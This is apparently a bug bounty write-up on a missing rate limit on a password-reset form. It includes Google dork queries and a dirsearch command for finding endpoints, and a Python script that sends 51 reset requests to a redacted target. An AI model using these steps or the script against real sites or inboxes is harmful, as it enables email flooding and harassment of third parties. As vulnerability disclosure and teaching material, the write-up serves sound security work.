Easy Bug: No Rate Limiting on Form which Triggers Emails
Overview of the Vulnerability:
Rate limiting prevents an application from becoming unresponsive or unavailable due to too many requests that exhaust the application’s resources. No limitations were identified on the rate of the forget password endpoint. This allows an attacker to create a large number of emails to any email address, which they can use to spam a target using emails.
Steps:
- Search for Potential Endpoints:
Use Google dorks to identify potential password reset endpoints. For example, use the search query:
[ site:*.Redacted.com intitle:”Reset Password” | ”Forget Password” ]
Endpoints can be found in many ways, e.g
Fuzzing:
dirsearch -u https://[Redacted].com/ --max-rate=5 -w ~/ur_wordlist.txt2. Capture the Request via Burp Suite or OWASP ZAP.
Fill out the form that triggers an email, using an email address that you own as the destination. For example, use free@Palestine.com.
the make a request and view response [Maybe you can notice whether there is a rate limit or not at response]
3. Use it “Burp Suite or OWASP ZAP” to send more than 50 requests to the email you own, in less than 10 seconds.
I created python code that helps me do this in another way:
import requests
url = "https://captest.[Redacted].com/Account/RequestPassword"
headers = {
"Host": "captest.[Redacted].com",
"Content-Length": "155",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
}
data = {
"UserName": "free@Palestine.com",
}
# Make 50 requests
for _ in range(51):
response = requests.post(url, headers=headers, data=data)
print(f"Response status code: {response.status_code}")
Impact:
- Mail box overflow
- Depletion of mail resources
- Causing inconvenience to users
